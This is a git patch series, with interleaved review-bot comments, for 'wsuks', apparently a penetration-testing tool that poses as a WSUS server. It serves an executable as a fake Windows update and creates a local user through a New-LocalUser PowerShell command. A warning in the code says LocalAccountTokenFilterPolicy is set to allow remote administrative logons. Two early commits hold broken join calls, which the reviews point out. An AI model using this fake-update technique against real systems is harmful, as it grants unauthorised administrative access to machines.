From 40ce3d7edcc6a37f5802c9a4b6ead02b9f05b38c Mon Sep 17 00:00:00 2001
From: kcancurly
Date: Wed, 29 Oct 2025 13:10:32 +0300
Subject: [PATCH 01/11] Add "!" for password complexity compliancve to generated password
---
 wsuks/wsuks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
index 5abca1d..793f377 100644
--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
@@ -32,7 +32,7 @@ def __init__(self, args):
 self.logger.error(f"Interface '{args.interface}' not found! Exiting...")
 exit(1)
 self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
- self.local_password = "".join(random.sample(ascii_letters, 16))
+ self.local_password = "".join(random.sample(ascii_letters, 16), "!")
 # Set args
 self.targetIp = args.targetIp # Never None (required)
From 20ba8042bfb52367a776fcfcead3ccfa126c6dd7 Mon Sep 17 00:00:00 2001
From: kcancurly
Date: Wed, 29 Oct 2025 13:12:13 +0300
Subject: [PATCH 02/11] fix
---
 wsuks/wsuks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
index 793f377..71d7738 100644
--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
@@ -32,7 +32,7 @@ def __init__(self, args):
 self.logger.error(f"Interface '{args.interface}' not found! Exiting...")
 exit(1)
 self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
- self.local_password = "".join(random.sample(ascii_letters, 16), "!")
+ self.local_password = "".join([random.sample(ascii_letters, 16), "!"])
 # Set args
 self.targetIp = args.targetIp # Never None (required)
From 137f4139126e396aa5dbc1be80297413abd2394f Mon Sep 17 00:00:00 2001
From: kcancurly
Date: Wed, 29 Oct 2025 13:14:01 +0300
Subject: [PATCH 03/11] fix 2
---
 wsuks/wsuks.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
index 71d7738..7b4dd8d 100644
--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
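Review bot: The added line in PATCH 01, `"".join(random.sample(ascii_letters, 16), "!")`, passes two arguments to `str.join`, which takes exactly one iterable, so `__init__` raises TypeError as soon as the object is constructed. The PATCH 02 hunk fails at the same spot for a different reason: the list it joins has a list as its first item, and `join` only accepts strings. Both revisions are unusable on their own, which gets in the way of bisecting; folding 01 and 02 into the commit that carries the working line would keep every revision runnable. `__init__` starts and ends outside these hunks.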
@@ -32,7 +32,8 @@ def __init__(self, args):
 self.logger.error(f"Interface '{args.interface}' not found! Exiting...")
 exit(1)
 self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
- self.local_password = "".join([random.sample(ascii_letters, 16), "!"])
+ self.local_password = "".join(random.sample(ascii_letters, 16)) + "!"
+
 # Set args
 self.targetIp = args.targetIp # Never None (required)
From a5604968e0d34f711945a6fb0f59aec4d71e5731 Mon Sep 17 00:00:00 2001
From: kcancurly
Date: Wed, 29 Oct 2025 13:17:14 +0300
Subject: [PATCH 04/11] u
---
 wsuks/wsuks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
index 7b4dd8d..c20153d 100644
--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
@@ -32,7 +32,7 @@ def __init__(self, args):
 self.logger.error(f"Interface '{args.interface}' not found! Exiting...")
 exit(1)
 self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
- self.local_password = "".join(random.sample(ascii_letters, 16)) + "!"
+ self.local_password = "".join(random.sample(ascii_letters, 16)) + "1" + "!"
 # Set args
From c6ca2396d5d8e6fa3f3c7fe3c129386d4b4b83ea Mon Sep 17 00:00:00 2001
From: kcancurly
Date: Wed, 29 Oct 2025 13:26:26 +0300
Subject: [PATCH 05/11] u
---
 wsuks/wsuks.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
index c20153d..163e942 100644
--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
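Review bot: The new `self.local_password` line in PATCH 03 takes its characters from the `random` module, which is not a cryptographic source, and `random.sample` draws without replacement, so no letter repeats and the trailing `!` is a constant. This string becomes the password of a local account on the updated host, and the warning visible in the PATCH 05 hunk says LocalAccountTokenFilterPolicy is set to allow remote administrative connections with local accounts, so a guessable value leaves that host open to anyone else who can reach it. `"".join(secrets.choice(ascii_letters) for _ in range(16)) + "!"` keeps the same shape and needs `import secrets` at the top of the file, which is outside the hunk. The same applies to the PATCH 04 and PATCH 09 versions of the line, where the fixed suffix grows to `1!` and the random part shrinks to 14 letters.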
@@ -88,7 +88,8 @@ def __init__(self, args):
 else:
 ps_script += line
 self.logger.success(f"Generated local user for the WSUS attack: Username={highlight(self.local_username, 'green')} Password={highlight(self.local_password, 'green')}")
- create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n"
+ # create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n"
+ create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force);\n"
 self.command = str(args.command).format(CREATE_USER_COMMAND=create_user, WSUKS_USER=self.local_username)
 self.logger.warning("WARNING: LocalAccountTokenFilterPolicy will be to 1 to allow remote administrative connections with local accounts. See README for details.")
 self.logger.success(f"Command to execute: \n{highlight(self.executable_name, 'yellow')} {highlight(self.command, 'yellow')}")
From d041c0821957f5f678b8b4dc8c44d991d9ef1a15 Mon Sep 17 00:00:00 2001
From: kcancurly
Date: Wed, 29 Oct 2025 13:34:31 +0300
Subject: [PATCH 06/11] u
---
 wsuks/helpers/wsusserver.py | 1 +
 1 file changed, 1 insertion(+)
diff --git a/wsuks/helpers/wsusserver.py b/wsuks/helpers/wsusserver.py
index f2eeb23..bb89c53 100644
--- a/wsuks/helpers/wsusserver.py
+++ b/wsuks/helpers/wsusserver.py
@@ -95,6 +95,7 @@ def set_resources_xml(self, command):
 command=html.escape(html.escape(self.command)),
 url=f"{self.client_location}/{uuid.uuid4()}/{self.executable_name}")
 file.close()
+ print("Serving KB: self.kb_number")
 with open(f"{path}/xml_files/report-event-batch.xml") as file:
 self.report_event_batch_xml = file.read()
From 5000eeeab78bc899c476594478c3eb64bb19ac81 Mon Sep 17 00:00:00 2001
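Review bot: The previous `create_user` line is kept as a comment directly above its replacement in the PATCH 05 hunk; version control already preserves it, and the dead line leaves it unclear which form is meant to ship. The replacement also drops the `-Description $(...)` argument that carried `ps_script`, so the text accumulated just above (`ps_script += line`) no longer appears in this command, and the subject line `u` does not say whether that is intended. If this was a debugging toggle it is better left out of the series: PATCH 08 swaps the two lines back (leaving a `#create_user` comment) and PATCH 09 deletes the comment. `__init__` starts and ends outside the hunk.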
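Review bot: The line added in the PATCH 06 hunk, `print("Serving KB: self.kb_number")`, is a plain string literal, so it prints the text `self.kb_number` instead of the attribute's value; it needs the `f` prefix and braces, `print(f"Serving KB: {self.kb_number}")`. It also writes straight to stdout, whereas the wsuks.py hunks report through `self.logger`; whether this class has a logger is not visible here, so that part is a question for the author. set_resources_xml starts and continues outside the hunk.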
From: kcancurly
Date: Wed, 29 Oct 2025 13:35:20 +0300
Subject: [PATCH 07/11] u
---
 wsuks/helpers/wsusserver.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/wsuks/helpers/wsusserver.py b/wsuks/helpers/wsusserver.py
index bb89c53..23bff05 100644
--- a/wsuks/helpers/wsusserver.py
+++ b/wsuks/helpers/wsusserver.py
@@ -95,7 +95,7 @@ def set_resources_xml(self, command):
 command=html.escape(html.escape(self.command)),
 url=f"{self.client_location}/{uuid.uuid4()}/{self.executable_name}")
 file.close()
- print("Serving KB: self.kb_number")
+ print(f"Serving KB: {self.kb_number}")
 with open(f"{path}/xml_files/report-event-batch.xml") as file:
 self.report_event_batch_xml = file.read()
From da0a9b911b668a65dc603219163e75e919a4b22a Mon Sep 17 00:00:00 2001
From: kcancurly
Date: Wed, 29 Oct 2025 13:36:55 +0300
Subject: [PATCH 08/11] u
---
 wsuks/wsuks.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
index 163e942..9b03856 100644
--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
@@ -88,8 +88,8 @@ def __init__(self, args):
 else:
 ps_script += line
 self.logger.success(f"Generated local user for the WSUS attack: Username={highlight(self.local_username, 'green')} Password={highlight(self.local_password, 'green')}")
- # create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n"
- create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force);\n"
+ create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n"
+ #create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force);\n"
 self.command = str(args.command).format(CREATE_USER_COMMAND=create_user, WSUKS_USER=self.local_username)
 self.logger.warning("WARNING: LocalAccountTokenFilterPolicy will be to 1 to allow remote administrative connections with local accounts. See README for details.")
 self.logger.success(f"Command to execute: \n{highlight(self.executable_name, 'yellow')} {highlight(self.command, 'yellow')}")
From f806922664330339cb62fa21db749ea461478647 Mon Sep 17 00:00:00 2001
From: kcancurly
Date: Wed, 29 Oct 2025 13:41:50 +0300
Subject: [PATCH 09/11] u
---
 wsuks/helpers/wsusserver.py | 1 -
 wsuks/wsuks.py | 4 ++--
 2 files changed, 2 insertions(+), 3 deletions(-)
diff --git a/wsuks/helpers/wsusserver.py b/wsuks/helpers/wsusserver.py
index 23bff05..f2eeb23 100644
--- a/wsuks/helpers/wsusserver.py
+++ b/wsuks/helpers/wsusserver.py
@@ -95,7 +95,6 @@ def set_resources_xml(self, command):
 command=html.escape(html.escape(self.command)),
 url=f"{self.client_location}/{uuid.uuid4()}/{self.executable_name}")
 file.close()
- print(f"Serving KB: {self.kb_number}")
 with open(f"{path}/xml_files/report-event-batch.xml") as file:
 self.report_event_batch_xml = file.read()
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
index 9b03856..14ba7c0 100644
--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
@@ -32,7 +32,7 @@ def __init__(self, args):
 self.logger.error(f"Interface '{args.interface}' not found! Exiting...")
 exit(1)
 self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
- self.local_password = "".join(random.sample(ascii_letters, 16)) + "1" + "!"
+ self.local_password = "".join(random.sample(ascii_letters, 14)) + "1" + "!"
 # Set args
@@ -89,7 +89,6 @@ def __init__(self, args):
 ps_script += line
 self.logger.success(f"Generated local user for the WSUS attack: Username={highlight(self.local_username, 'green')} Password={highlight(self.local_password, 'green')}")
 create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n"
- #create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force);\n"
 self.command = str(args.command).format(CREATE_USER_COMMAND=create_user, WSUKS_USER=self.local_username)
 self.logger.warning("WARNING: LocalAccountTokenFilterPolicy will be to 1 to allow remote administrative connections with local accounts. See README for details.")
 self.logger.success(f"Command to execute: \n{highlight(self.executable_name, 'yellow')} {highlight(self.command, 'yellow')}")
@@ -148,6 +147,7 @@ def run(self):
 try:
 self.logger.info(f"Starting WSUS Server on {self.hostIp}:{self.wsusPort}...")
+ self.logger.info(f"Serving KB: {update_handler.kb_number}")
 http_server.serve_forever()
 except KeyboardInterrupt:
 print()
From 4ee4d1cfbd7c64001d098263f243d79cb3f4547a Mon Sep 17 00:00:00 2001
From: Alexander Neff
Date: Wed, 29 Oct 2025 07:27:00 -0400
Subject: [PATCH 10/11] Refine log message
---
 wsuks/wsuks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
index 14ba7c0..40fd614 100644
--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
@@ -147,7 +147,7 @@ def run(self):
 try:
 self.logger.info(f"Starting WSUS Server on {self.hostIp}:{self.wsusPort}...")
- self.logger.info(f"Serving KB: {update_handler.kb_number}")
+ self.logger.info(f"Serving executable as KB: {update_handler.kb_number}")
 http_server.serve_forever()
 except KeyboardInterrupt:
 print()
From 0f55dd1c341aa568f2858fec7d13910613b66534 Mon Sep 17 00:00:00 2001
From: Alexander Neff
Date: Wed, 29 Oct 2025 07:44:44 -0400
Subject: [PATCH 11/11] Linting
---
 wsuks/wsuks.py | 1 -
 1 file changed, 1 deletion(-)
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
index 40fd614..e70f7f6 100644
--- a/wsuks/wsuks.py
+++ b/wsuks/wsuks.py
@@ -34,7 +34,6 @@ def __init__(self, args):
 self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
 self.local_password = "".join(random.sample(ascii_letters, 14)) + "1" + "!"
-
 # Set args
 self.targetIp = args.targetIp # Never None (required)
 self.executable_file = args.executable.read()